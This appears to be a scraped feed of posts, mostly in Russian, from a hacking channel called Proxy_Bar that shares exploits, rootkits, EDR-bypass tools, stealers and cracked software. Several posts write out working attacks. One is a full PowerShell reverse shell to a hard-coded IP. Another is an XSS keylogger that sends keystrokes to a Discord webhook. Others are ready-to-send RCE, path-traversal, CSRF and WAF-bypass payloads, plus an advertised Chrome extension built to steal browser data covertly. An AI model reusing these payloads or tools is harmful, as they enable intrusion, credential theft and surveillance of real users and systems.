Proxy_Bar

Posts

Date Content Media
2023-03-23 05:28:39
kernel-linux-factory*Удобно тем, что не нужно компилировать или настраивать среду, глянул какое ядро, запустил сплоет, получил по морде #root*в составе exploits для:CVE-2016-97934-20-BPF-integerCVE-2017-5123CVE-2017-6074CVE-2017-7308CVE-2017-8890CVE-2017-11176CVE-2017-16995CVE-2017-1000112CVE-2018-5333CVE-2019-9213 & CVE-2019-8956CVE-2019-15666CVE-2020-8835CVE-2020-27194CVE-2021-3156CVE-2021-31440CVE-2021-3490CVE-2021-22555CVE-2021-41073CVE-2021-4154CVE-2021-42008CVE-2021-43267CVE-2022-0185CVE-2022-0847CVE-2022-0995CVE-2022-1015CVE-2022-2588CVE-2022-2639CVE-2022-25636CVE-2022-27666CVE-2022-32250CVE-2022-34918download#linux #exploits #kernel
2023-03-22 20:33:43
pic of day Images
2023-03-20 19:19:16
bypass for the FortiWeb (Fortinet) WAFusage:"><iframe src=//14.rs>то есть вместо стандартной полезной нагрузки XSS для выполнения js Images
2023-03-20 18:47:47
Рубрика нам пишутBlack Angel is a Windows 11/10 x64 kernel mode rootkit. Rootkit can be loaded with enabled DSE while maintaining its full functionality. link Images
2023-03-19 18:29:46
UAC bypass for x64 Windows 7 - 11Понятно iscsicpl.exe уязвим к перехвату порядка поиска DLL при запуске 32-битного бинарного файла Microsoft на 64-битном хосте через SysWOW64. Images
2023-03-19 18:19:16
Laravel FrameworkPayload: //////////////////../../../../../../../../etc/passwd Images
2023-03-18 22:09:59
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно. Тупо бэкдор!usage:powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
2023-03-10 18:48:36
полезные нагрузки подъехалиpayloads Images
2023-03-10 18:29:50
Круто !!! old school sniffing RJ45берем крокодильчикицепляем на витухупогналиVideo Images
2023-03-09 14:54:58
🧐 Images
2023-03-09 11:56:52
Offline создание администратора Windows 10? 😈ОгаВсё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.OfflineAddAdmin2 (это новая версия)Видео туториал Images
2023-03-09 04:54:56
CVE-2023-21768 Local Privilege EscalationWindows 11 22H2POC exploit *usage:Windows_AFD_LPE_CVE-2023-21768.exe <pid>где <pid> это id процесса который нужно повысить до system#windows #lpe
2023-03-08 05:51:12
0-CLICK Microsoft Word RCE exploitCVE-2023-21716 PythonPoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
2023-03-07 20:41:48
8 марта вот вот настанет ! 😊Поддержим проект ?)BTC bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82XMR 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k#праздник
2023-03-07 19:14:12
pic of day Images
2023-03-07 11:58:34
BurpSuite* man\tutorВдруг вы забыли Images
2023-03-05 20:50:14
Внимание !через 10 минут опять понедельник.Вот вам rootkit dog😎
2023-03-05 08:02:55
использование setuid dos2unix позволяет выполнять запись произвольного файла от имени пользователя root. Images
2023-03-04 05:12:06
RemoteShellcodeExecВыполнение шелл-кода из удаленного bin-файла с помощью Winhttp.Shellcodes are dead, long live fileless shellcodes.*Пока что 0/26 detectionsdownload Images
2023-03-03 04:49:59
Нужно больше жира))))) Analyzing a Python Malware Part 2 Images
2023-03-02 16:03:45
None
2023-03-02 05:02:56
Titan stealer и его панель (C2Panel) жирно палитсяThreatFox Database Images Images
2023-03-01 18:56:12
bash injection bypass waf $0<<<$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\' Images
2023-02-27 18:32:12
Lazarus-Tactic (APT38)*Можно написать 0day, а можно регулярно воровать 0days у трудолюбивых исследователей безопасности. Именно этим (ну не только) и занимались ребята из APT38, заражая Visual Studio (vcxproj).В общем такой 0day-stealer**После запуска программа заразит все ваши проекты Visual Studio**
2023-02-26 14:03:52
TCP Data Transfer Tool Прикольно конечно в кернелМемори писать гадости\радости всякие.В общем получается почти !!! fileless attack, техника не новая и что там с runtime детектами не понятно, но все равно интересно.Скачать бесплатно и без смс уникальный крест доминика торето сделанный из легендарной финки нквд можно только на джойказино, мать его.
2023-02-26 07:11:56
bootlickerУстаревший (?) расширяемый руткит прошивки UEFI, предназначенный для виртуальных машин гипервизора vmware. Он предназначен для выполнения начального кода в контексте ядра Windows, независимо от настроенных параметров безопасности.*vmvware-bootkit основан на устаревших руткитах CosmicStrain, MoonBounce и ESPECTRE, что позволяет выполнять произвольное выполнение кода без срабатывания patchguard*Download bootlicker#rootkit #bootkit
2023-02-24 12:07:37
OpenSSH 9.1 exploit and mass scan*Уязвимость CVE-2023-25136 влияет на процесс предварительной аутентификации SSH. Используя его, атакующий может повредить память и выполнить произвольный код на машине без аутентификации на целевом сервере.download exploit and mass scan#ssh #exploit #scanner
2023-02-23 11:33:48
Уполномоченный руководитель субъекта КИИ теперь ответственный, а заниматься защитой объекта можно без высшего образования — достаточно среднего. ФСТЭК внесла изменения в стандарты.Яяяяяяяяяяяяяяяяяяяяяяяясно блеать, можно продолжать платить по студенческим расценкам !Тем временем:#СкребемПоКиберСусекам
2023-02-22 16:11:10
Ударим ГовноПарсером lsass по приближающимся выходным !download this shit (вас блин предупреждали)
2023-02-22 07:07:06
Weblogic-CVE-2023-21839*Affected version12.2.1.3.012.2.1.4.014.1.1.0.0POCUsage POC:java -jar target ip: адрес порта ldap
2023-02-22 06:59:38
Давайте создадим расширение для Chrome, которое крадет ВСЁ*Ключевые правила:1.Пользователь не должен знать, что за кулисами что-то происходит.2.Не должно быть никаких визуальных признаков того, что что-то не так.3.Никаких дополнительных консольных сообщений, предупреждений или ошибок.4. Нет дополнительных предупреждений браузера или диалогов разрешений.5.Нет дополнительного сетевого трафика на уровне страниц.*В итоге мы воруем: - Cookies - History - Screenshots - User Navigation - Page Traffic - Keylogger - Input Capturing - Clipboard Capturing - Capturing Geolocation - Stealth Tab *Залить все это в Chrome Web Store конечно нереально))) А вот залить через GPO ... в общем дальше сами )spy-chrome-extension#chrome #extension
2023-02-21 14:43:33
CVE-2022-39952 Fortinet FortiNAC CVSS score of 9.8Продукты, затронутые уязвимостью: FortiNAC version 9.4.0 FortiNAC version 9.2.0 through 9.2.5 FortiNAC version 9.1.0 through 9.1.7 FortiNAC 8.8 all versions FortiNAC 8.7 all versions FortiNAC 8.6 all versions FortiNAC 8.5 all versions, and FortiNAC 8.3 all versionsPOC exploit#forti #poc
2023-02-20 07:09:19
HIVEМы продолжаем следить за наработками @c4s73r и сегодня он зарелизил HIVE.В личной переписке он сознался что - смотреть скриншотVLAN L2 Pivoting Instrument#network #hacking
2023-02-18 11:00:31
Привет)
2023-02-17 04:51:18
CVE-2023-23752Joomla webservice endpoint accessPoChttpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
2023-02-16 18:29:01
CVE-2022-44666WriteUp по одной забытой уязвимости Windows (0day): выход атрибута href управления системной ссылкой Microsoft Windows Contacts (VCF/Contact/LDAP), который не был полностью исправлен как CVE-2022-44666 в исправлениях, выпущенных в декабре 2022 года. А значит, жир еще впереди.POC в наличииGo#win #poc #vuln
2023-02-16 18:20:57
Ну VirusTotal как C2 уже былGithub as C2 почему бы и нет )Get#C2
2023-02-16 13:45:33
SSH-Remote-Code-Executionхммммм 🤨
2023-02-16 04:48:32
Вдруг вам нужноBurp Suite Certified Practitioner Exam Study
2023-02-15 10:10:44
Рекомендовано всем к прочтениюлинк xss.is
2023-02-13 18:51:19
RCE in Western Digital PR4100 NASspeech_exploit_patch
2023-02-13 18:28:38
Windows LPE via StorSvcdownload
2023-02-13 18:26:25
Драсти
2023-02-11 12:18:21
BokuLoaderРасширяем возможности уклоненийBokuLoader - Cobalt Strike Reflective Loader
2023-02-10 11:39:00
Извините, но пятничное )
2023-02-10 04:34:18
DEUS X64
2023-02-09 04:52:45
CVE-2023-25136 - OpenSSH - Pre-Auth Double FreeWriteupPoC - вызывает DOS серванта
2023-02-08 18:29:35
backdoor и shellCode билдер под разные архитектуры (0x001)hackebds#shellcode #backdoor #arch
2023-02-08 18:19:07
UnhookingPatchОпять byPass опять EDRПюрешка с котлеткой#win #edr
2023-02-08 10:05:02
NetworkNightmareВеликолепный Магама AKA @c4s73r в рамках сетевого беспредела опубликовал свои труды на благословенной гитхабе.С чем поздравляем и поддерживаем ! 😜NetworkNightmare#подрывУстоев #network
2023-02-08 04:43:03
LFI
2023-02-07 05:17:33
exploit для активно эксплуатируемой уязвимости нулевого дня, затрагивающий консоли администрирования GoAnywhere MFT.readshodan - total 1000exploit
2023-02-06 16:20:44
Лол))))) SSRF
2023-02-06 15:45:05
Nidhogg rootkitВиндовый rootkit написанный на C++, по заявлению авторов сильно дружит с любыми версиями win 10 и win 11. Так же руткит можно примотать синей изолентой к своему C&C и долго медитировать на бегущий трафик.Скачать тут#rootkit #windows #redteam
2023-02-06 15:24:21
Картоха ! from Service to SYSTEMRasmanPotatodownload#windows #priv
2023-02-06 13:11:51
CVE-2022-44268Arbitrary File Read PoC - PNG generatorPoC
2023-02-06 09:48:19
BypassAVкарта с основными методами обхода антивируса и EDR.MAP
2023-02-05 07:00:54
DevOps игры (в рамках эксперимента воскресенья)*devops.gamesdevopspartygamesoverthewire (linux war games)ohmyGITcodingame
2023-02-05 06:06:59
SCRIPT HTTP-SQL-INJECTION (NMAP)download
2023-02-04 16:36:09
BurpSuiteSharpenerdownload
2023-02-04 10:21:12
CVE-2023-25135vBulletin - RCE + exploitman+exploit#exploit #vBulletin
2023-02-04 08:55:30
RATникиВчера мы говорили про мартицы C&C серверов\фреймворковА сегодня про матрицу RATТут хватит всем #rat
2023-02-04 08:47:58
CVE-2023-0045Bypassing Spectre-BTI User Space Mitigations on Linux
2023-02-04 07:21:24
Acunetix Premium v15.3.230123162_Win x64+crack
2023-02-03 21:27:46
NTDLLReflectionОбход перехватчиков EDR Userland путем загрузки Reflective Ntdll в память с удаленного сервера на основе Windows ReleaseID, чтобы избежать открытия дескриптора для ntdll и активировать экспортированные API-интерфейсы из таблицы экспорта.*В общем очередной (свежий) ByPassdownload#windows #bypass
2023-02-03 16:34:34
CobaltStrike ? НЕТ !Тут хватит всемВпрочем об альтернативах мы уже писали несколько раз#C2 #c&c
2023-02-03 03:42:01
IBM Aspera Faspex - Pre-Auth RCE+ exploit coderead and run
2023-02-02 20:04:27
Я просто оставлю это здесь - ЫТЬ CVE-2022-44268 POC
2023-02-02 16:31:02
CVE-2023-21608 - RCE - Adobe Acrobat ReaderVideo proofpass: proxy_bar#exploit #rce #acrobat
2023-02-02 09:37:51
Художественный фильм "спиз.." "golden certificates"*certsync - это новая техника для удаленного дампа NTDS, но на этот раз без DRUAPI: он использует золотой сертификат и UnPAC хеш. * domain admin - не нужен, хватит и CA admindownload#windows #cert
2023-02-02 05:27:00
RedTeam-ToolsИнструменты и техники для Red TeamИмеровover 100 toolsdownload#red #pentest #tools #man
2023-02-01 04:52:25
PassTheCertаутентификация на сервере LDAP/S с сертификатом через SchannelПока в виде концепта, но уже интересно
2023-02-01 04:33:26
CVE-2023-23924 библиотека Dompdf - RCECVSS score: 10 !!!Конкретнее о дырке тут#php #vuln #poc
2023-01-31 16:30:16
exploit for VMware vRealize Log InsightTechnical Deep Divedownload EXPLOIT#exploit #vmware
2023-01-31 04:59:22
D1rkLrd - свежее1 - Shellcode Loader with Indirect Dynamic syscall Implementation2 - shellcode in MAC format3 - API resolving from PEB4 - Syscall calll and syscall instruction address resolving at run timedownload#windows #shellcode
2023-01-31 04:47:53
CVE-2022-25765 - PDFkit-CMD-InjectionПодробности дырки тутexploit#exploit
2023-01-31 04:36:55
УтрыDecompiler Explorer
2023-01-30 15:12:16
Tangled WinExecКрайне интересно, загляните в папку ReflectiveDLLInjectionпосмотреть
2023-01-30 13:34:05
BypassCredGuardОбход Credential Guard через исправление памяти Wdigestdownload#windows #bypass
2023-01-29 19:59:11
MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated)exploit#myBB
2023-01-29 17:37:26
Может лучше не ставить этот ваш windows 11 ?Скоро придется компьютер клеткой Фарадея накрывать, а вместо инета - юзать диод данных. *Ну так вот, объемный гайд по ОТКЛЮЧЕНИЮ ТЕЛЕМЕТРИИ и всякого зла от мелкомягких.*Windows 11 Debloat / Privacy Guide
2023-01-29 12:08:58
PHP Development Server <= 7.4.21 - Remote Source Disclosureread#php #vuln
2023-01-29 10:59:43
Exploit for full access to disk C:\ (for all users) pass: proxy_bardownload#exploit #C #windows
2023-01-29 08:28:56
Invicti 2023 + REG file (бывший NetSparker)*archive Pass: proxy_bar
2023-01-28 21:09:09
sshd_backdoor*/root/.ssh/authorized_keys evil file watchdog with ebpf tracepoint hook. Прикольно, а я все по старинке PAM модули прописываю, да и руткиты под *nix тем же занимаются.download#ssh #bckdoor
2023-01-28 08:49:33
Будьте бдительны, скамеры не спят
2023-01-28 06:00:00
Kali-PurpleThe ultimate SOC-in-a-box community project*1. Practice Ops: Virtualization, firewalls, VLAN, WAF, SIEM, IDS/IPS, ...2. Practice Red: Penetration testing of vulnerable machines while seeing what the blue team sees. 3. 3. Can you become stealthier?4. Practice Blue: Firewall and IPS rules, SIEM analysis and dashboard development, ...5. Purple teaming: Red and Blue working together to develop the ultimate set of rules6. Protect: Deploy Kali-Purple to protect your networkdownload
2023-01-27 19:16:44
Пост восхваления хакера Raptor (ака Marco Ivaldi)Нужно отдать должное, как никак человек жизнь положил на алтарь exploit research.Ознакомьтесь с его github/0xdea и сплоитами которые он писал больше 20 лет - всегда бывает полезно глянуть в историю.#deadcow
2023-01-27 05:06:23
cat /etc/passwd16bit format{\c''\a""t,/e''*?/?a?s??}или{\c''\a""\t,/\e''*?/\p*\d}
2023-01-26 16:48:31
Слово "консультант" - предполагает под собой отказ от ответственности ? )))😁
2023-01-26 14:21:26
CVE-2022-34689Windows CryptoAPI spoofing vulnerability.Дырку в сыре обнаружили АНБ и NCSC Великобритании, она позволяет подделывать сертификаты коллизии MD5 и вообще манипуляции с сертификатом x.509. Exploit#windows #x509
2023-01-26 04:44:37
Yandex Git repository leaked *Несколько часов опубликовали 40Gb+ протекшего GIT-репозитория Яндекса.а именно:aapi.tar.bz2admins.tar.bz2ads.tar.bz2alice.tar.bz2analytics.tar.bz2antiadblock.tar.bz2antirobot.tar.bz2autocheck.tar.bz2balancer.tar.bz2billing.tar.bz2bindings.tar.bz2captcha.tar.bz2cdn.tar.bz2certs.tar.bz2ci.tar.bz2classifieds.tar.bz2client_analytics.tar.bz2client_method.tar.bz2cloud.tar.bz2commerce.tar.bz2connect.tar.bz2crm.tar.bz2crypta.tar.bz2customer_service.tar.bz2datacloud.tar.bz2delivery.tar.bz2direct.tar.bz2disk.tar.bz2docs.tar.bz2drive.tar.bz2extsearch.tar.bz2fuzzing.tar.bz2gencfg.tar.bz2groups.tar.bz2helpdesk.tar.bz2infra.tar.bz2intranet.tar.bz2investors.tar.bz2it-office.tar.bz2jupytercloud.tar.bz2kernel.tar.bz2library.tar.bz2load.tar.bz2mail.tar.bz2maps.tar.bz2maps_2.tar.bz2maps_adv.tar.bz2market.tar.bz2metrika.tar.bz2mobile-WARNING-notfull.tar.bz2nginx.tar.bz2noc.tar.bz2partner.tar.bz2passport.tar.bz2pay.tar.bz2payplatform.tar.bz2paysys.tar.bz2portal.tar.bz2robot.tar.bz2rt-research.tar.bz2saas.tar.bz2sandbox.tar.bz2search.tar.bz2security.tar.bz2skynet.tar.bz2smart_devices.tar.bz2smarttv.tar.bz2solomon.tar.bz2stocks.tar.bz2tasklet.tar.bz2taxi.tar.bz2tools.tar.bz2travel.tar.bz2wmconsole.tar.bz2yandex_io.tar.bz2yandex360.tar.bz2yaphone.tar.bz2yawe.tar.bz2frontend.tar.bz2
2023-01-25 15:23:50
CVE-2023-23504 - Apple products*Протекает dlil.c XNU который обрабатывает сетевые интерфейсы, вызванный целочисленным переполнением (uint16_t) в if.c. Всего лишь надо то создать 65536 сетевых интерфейсов.
2023-01-24 13:59:48
Фу, блин, Но POC есть POC CVE-2023-22960Обод механизма предотвращения подбора учетных данных встроенного веб-сервера (интерфейса) более чем 60 моделей принтеров Lexmark.*Фор Даунлоаде зысис щит, фолоу ту зэ линк, май френд
2023-01-23 09:00:31
LPE - Solaris 10Злоупотребление в dtprintinfo*Есть такой ресёрчер Marco Ivaldi (дохлая корова) который шлепает сплоиты с бородатого 2000 года, хоть соляру сейчас найти сложно, но все равно красивоexploit
2023-01-22 12:19:03
Это может быть интересноADReplStatus*Active Directory Replication Status Tool, aka ADREPLSTATUS - 2023download
2023-01-22 11:45:38
For BurpSuiteAPIKit:Discovery, Scan and Audit APIs Toolkit All In One.download#Burp #plugins
2023-01-22 11:17:58
SugarCRM 0-day Auth Bypass + RCE Exploit
2023-01-22 09:13:28
CVE-2023-0398 modoboa - mail ServerCSRF приводит к удалению домена*usage fot BURP:<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1:8000/admin/domains/4/delete/"> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body></html>read
2023-01-21 13:38:56
переоформим !
2023-01-21 13:17:38
CVE-2023-0179 PoCэксплойт для уязвимости в Nftables, затрагивающий все версии Linux от 5.5 до 6.2-rc3, хотя эксплойт тестировался на свежем ядре 6.1.6Понять глубину#linux #kernel #lpe #nftables
2023-01-21 11:11:28
Microsoft Teams - RCEdownload
2023-01-21 08:15:18
Коннектимся!
2023-01-21 05:34:17
RDPAsynchronous RDP client for Python (headless) *Ну Вы понимаете, да ? )))подобрать
2023-01-20 17:03:12
Если я пойду и долиною смертной тени, не убоюсь зла, потому что Ты со мной openAI;Твой жезл и Твой посох - они успокаивают меня. Ты приготовил предо мною трапезу в виду врагов моих; умастил елеем голову мою; чаша моя преисполнена.BOT off как вы поняли
2023-01-20 14:35:30
Wolfenstein 3D CGAТут и описание то не нужно. забрать#wolf #90
2023-01-20 05:22:32
В продолжении темыПоявился nuclei-template для дыры CVE-2022-47966.yamlНу и сам nuclei забрать тут****Bonus для blueTeam - правило обнаружения эксплуатации дыры для Sigma - забрать
2023-01-19 19:37:32
Exploiting null-dereferences in the Linux kernel Интересное#linux #kernel
2023-01-19 18:50:00
SUDO KILLERТулза для выявления и использования неправильных конфигураций и уязвимостей правил sudo для повышения привилегий Linux.download
2023-01-19 16:23:57
Чаты и каналы Telegram по информационной безопасности 2023 Хорошая подборочка over 100, но нас в ней нет ((Забираем
2023-01-19 14:43:56
CVE-2022-47966*Список ПО от ManageEngine подверженных атаке поражает !* Уязвимость позволяет удаленное выполнение кода, отправив HTTP-запрос POST, содержащий вредоносный ответ SAML. А всё из за не патченной версии Apache Santuario для проверки подписи XML.*read*POC/exploit*Usage:python3 CVE-2022-47966.py --url https://10.0.40.64:8080/SamlResponseServlet --command notepad.exe
2023-01-19 08:44:14
CVE-2023-22809 - опять Sudo, опять bypass😏#Unix #linux #sudo #bypass
2023-01-18 11:38:40
NGINXConfigСамый простой способ настроить производительный, безопасный и стабильный NGINX сервер.Ну вдруг вам нужно, натыкали галочек, получили конфиг.НаТыкать#nginx
2023-01-18 04:35:35
CVE-2022-46463 Проблема контроля доступа в Harbour v1.X.X–v2.5.3 позволяет злоумышленникам получать доступ к общедоступным и частным репозиториям без аутентификации.Вообще Харбор крутая штука, для devops\devsecopsexploit#harbor #repo
2023-01-17 12:35:40
ОТСТАВИТЬ ПАНИКУБОТ был и останется бесплатным.Сейчас тестируются новые фичи. К вечеру все будет доступно в одном из двух вариантов:1. Допуск по телеграмм id для всех желающихили2. Допуск как и раньше, но с таймаутом сообщений в 30 сек3. симбиоз первого и второго варианта
2023-01-17 09:42:13
CVE-2023-0297Pre-auth RCE in pyLoadreadExploit Code:curl -i -s -k -X $'POST' \ --data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \ $'http://<target>/flash/addcrypted2'
2023-01-17 09:22:32
Windows Kernel Elevation of Privilege Vulnerability.CVE-2022-21881cve-2022-21881-io_completion-poc.cpp
2023-01-16 16:41:53
ChatGPT - для RedTeam и BlueTeamГодная статья с хорошими примерами Читать OpenAI ChatGPT for Cyber SecurityЕсли нет учетки OpenAI - попробовать свои силы можно в нашем боте#openAI
2023-01-15 05:22:05
Cellebrite & MSABДанные от Cellebrite и MSAB, двух компаний, которые предоставляют правительствам инструменты для взлома телефонов, были слиты.*Утечка включает в себя фактическое программное обеспечение, а также документацию.*Эти инструменты использовались против журналистов, активистов и диссидентов по всему миру.
2023-01-15 04:33:49
next generation Firewall - а главное, надежный 😜
2023-01-14 07:32:22
chatGPT openAIпока в режиме тестаproxy_bar_openAI_bot#openAI #chatGPT #skynet
2023-01-14 05:04:20
ExplorerPersistперехват загрузки cscapi.dll и как итог - внедрение "нашей" dll с "нашим" функционалом.Ну а Persistence в том что отрабатывает каждый раз при запуске проводникаdownload
2023-01-13 11:57:53
Сжато, ёмко, всеобъемлюще, БАЗА !!!))))Для этих гребаных web-мастеров - motherfuckingwebsite.comЭтому не научат на курсахЧто то даже БаШорг вспомнился версии 2004 года....#humor #web #lol
2023-01-13 09:53:55
охх))) RecycleBin снова в деле ! ) RecyclePersist
2023-01-13 09:00:18
Новость по утечке в mail.ru - шляпа.И ничего полезного в ней нет. Разве что чисто на прозвон3505917 строк
2023-01-13 04:43:48
CVE-2022-3656*Затронуто более 2,5 миллиардов пользователей Google Chrome и браузеров на базе Chromium.Эта уязвимость позволяет украсть конфиденциальные файлы, такие как зашифрованные кошельки и учетные данные облачного провайдера.
2023-01-12 05:09:08
CVE-2023-21752Свежайшая Дыра (от 10 января) в службе резервного копирования WindowsLPE от юзера до системыAbout vulnexploit#windows #exploit #lpe
2023-01-11 18:14:45
CVE-2023-0210В новый год, с новыми дырамиFlaw in Linux Kernel Allows Unauthenticated remote DOS AttacksPOC - ручками наберете#linux #kernel
2023-01-11 17:53:04
Списки docker образов для прокачки Пентестаfor pentesterts
2023-01-11 05:33:46
Активация windows и officeБыстрый способ без всяких KMS_autousage:PowerShell от админа и вставляем:irm https://massgrave.dev/get | iex и выбираем нужный пункт, ВСЁили такНу мало ли Вам нужно.
2023-01-11 05:05:42
Exploit for CVE-2022-20452 privilege escalation on Android from installed app to system app (or another app)downLoad#android #exploit
2023-01-10 12:50:56
ChatGPT Ultimate Resource Guide WoW
2023-01-10 10:40:34
Атаки на банкоматы с использованием вредоносного ПОAzaZAвсе как вы любите
2023-01-10 10:35:07
Chrome-V8 RCEexploit
2023-01-10 05:03:27
ChatGPT_PoC - продолжаем наблюдение ))))#openAI
2023-01-10 04:37:59
CVE-2022-31705POCGeekpwn 2022 Vmware EHCI OOBdownload
2023-01-09 13:00:00
CVE-2022-41076The OWASSRF + TabShell exploit chaintabshell_poc.ps1
2023-01-09 11:05:21
Kerberos attacks 1-Kerberoasting AzaZa#Kerberos
2023-01-08 17:17:57
CVE-2022-44877Control Web Panel Unauth RCEPOC usage:POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Host: vulnContent-Type: application/x-www-form-urlencodedusername=root&password=toor&commit=Login
2023-01-08 11:20:47
Расходимся, мы тут лишниечитать всю статью
2023-01-08 09:28:55
Malware Analysis Series (MAS): Article 7Опа, седьмая часть вышла !PDF#malware #destroy #happy
2023-01-08 05:34:03
FilelessNtdllReflectionЕще один Bypass Userland EDRdownload#bypassEDR
2023-01-07 06:40:03
ААА сука, в голосину)))))))))))))))Linux find Windows 10/11 OEM product key command*Был ноут с windows, поставили linux, но ключ от винды хотим "подарить" ?)))sudo cat /sys/firmware/acpi/tables/MSDM | tail -1Смешное
2023-01-07 06:31:29
UnhookingPatchBypass EDR download
2023-01-06 17:09:37
Ребята, всем привет !!!!Прошел НОВЫЙ ГОД и вот вот наступит рождество !!!А это значит что PROXY_BAR всех Вас поздравляет, желает удачи, здоровья и взлома без последствий )))))В общем с праздниками ВАС )))))*****Ну и если Вам нравится то что мы делаем, Вы можете нас поддержатьBitcoin bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k
2023-01-06 15:05:21
PhpMyAdmin Setup - доступен без аутентификации )))****1. ищем хосты через shodan и censys2. все IP сканим на на ниличие службы ПХПмайАдмин3. wappalyzer покажет php, лучше использовать php.txt 4. phpMyAdmin/setup найден ))
2023-01-06 07:10:07
CVE-2022-44877Centos Web Panel 7 Unauthenticated Remote Code Executiondownload#centos #rce
2023-01-06 05:08:50
OFFENSIVE SECURITY & REVERSE ENGINEERING (OSRE) Coursedownload
2023-01-05 20:15:02
Alcatrazдвоичный обфускатор под x64, способный запутывать различные PE-файлы, включая:.exe.dll.sysdownload
2023-01-05 12:25:55
Shellcode MutatorПрячемся от сигнатур !downloadusage:mutate.py [-h] [-t SHELLCODE_TEMPLATE] [-s SHELLCODE_FILE] [-m MORPH_PERCENTAGE] [-v] [-x86]#shellcode #Morphin
2023-01-05 10:06:47
Casper-fs Это генератор пользовательских скрытых модулей ядра Linux. Каждый модуль работает в файловой системе для защиты и сокрытия секретных файлов. Понимаете ?)))*download*video
2023-01-04 19:26:04
Gepetto: IDA plugin which queries OpenAI's ChatGPT to explain decompiled functionsdownload#ida #ai
2023-01-04 13:10:19
exploit for CVE-2022-46164 осознать
2023-01-04 12:49:44
Выносите святых, опять спулер (стар, но автоматичен)#windows #spooler #exploit #for_fun
2023-01-04 12:44:10
Exploiting CVE-2022-42703 - Bringing back the stack attack Когда протекает память - почитать#linux #memory #exploit
2023-01-04 12:38:35
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypassread_look
2022-12-29 05:25:32
Kernel Exploits Recipes Notebookread#linux #kernel #exploit
2022-12-28 05:40:26
WebKit+Kernel exploit chain for all PS Vita firmwares Ну вдруг вам нужно)download
2022-12-27 17:57:00
Hidden firewall in Linux KernelКак дополнительный рубеж безопасности для сервера*ReadME*DownloadME*WatchMe
2022-12-27 13:07:48
Коллекция Exploits - MacOS*CVE-2022-22583CVE-2022-22616CVE-2022-22639CVE-2022-26690CVE-2022-26712CVE-2022-26728CVE-2022-32786CVE-2022-32800*download#exploit #macOS
2022-12-27 05:21:23
Force AdminСоздаем бесконечные запросы UAC, заставляющие пользователя работать от имени администратора. Лол, ну то есть админа тупо достали)))) как достать соседаdownload
2022-12-25 15:06:37
Рубрика - нам пишутHey, I've got pretty cool project that you could put on proxybar*Shellcodevэто инструмент, предназначенный для помощи в автоматизации создания шелл-кодов.download#shellcode
2022-12-25 09:48:28
Linux kernel exploit development*book#exploiting #linux
2022-12-24 17:08:03
CVE-2022-42046 Наконец то опубликовалиlocal privilege escalation POC download#windows #lpe #poc
2022-12-23 10:58:54
Wordpress - XSS ( CVE-2022-29455)/wp-content/plugins/elementor/assets/js/frontend.min.jsusage:https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==#wordpress #xss
2022-12-23 10:52:01
XSS Payload - Discord Keyloggerusage:<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>#discord #xss
2022-12-23 07:48:50
Linux Kernel RCE (ksmbd)*CVSS SCORE: 10 из 10*Детали тутПатч прилетел в ядро только в ветке 5.15.61#10из10
2022-12-22 11:14:45
Охота на C2 C&C сервераПонимание работы и обнаружение фреймворков C2 (C&C) *1. Understanding & Detecting C2 Frameworks — TrevorC22. Understanding & Detecting C2 Frameworks — Ares3. Understanding & Detecting C2 Frameworks — HARS (HTTP/S Asynchronous Reverse Shell)4. Understanding & Detecting C2 Frameworks — BabyShark*BonusTrack:Download BabyShark#C2 #hackers #botnets
2022-12-22 06:29:41
CVE-2022-2602 - exploitОпубликован PoC Kernel Privilege Escalation Linux*О чем это, прочитать тут_1 и тут_2*POC (точнее два) - забратьExploit - забрать#linux #kernel #exploits
2022-12-22 06:19:25
Оценка уязвимостей с помощью Nmap ?Вам нужен ВУльтерВьюер ! *Из коробки умеет:Server IP addressNetwork port numberNetwork port statusProtocol used by the network portNetwork service operating on the network port and its versionVulnerability CVE-identifierVulnerability ratingURL-link to the description of the vulnerability on the platform Vulners.comЗаказывайте прямо сейчас с уникальной финкой лгбтDownload
2022-12-21 14:17:14
log4j ДА, еще один, но попрощеusage:python3 hik.py https://localhost:443 xxx.oastify.com:80downLoad
2022-12-21 14:01:37
Php Remote file Inclusion and RCE in flatpressblog/flatpressProof of Concept#php #vuln
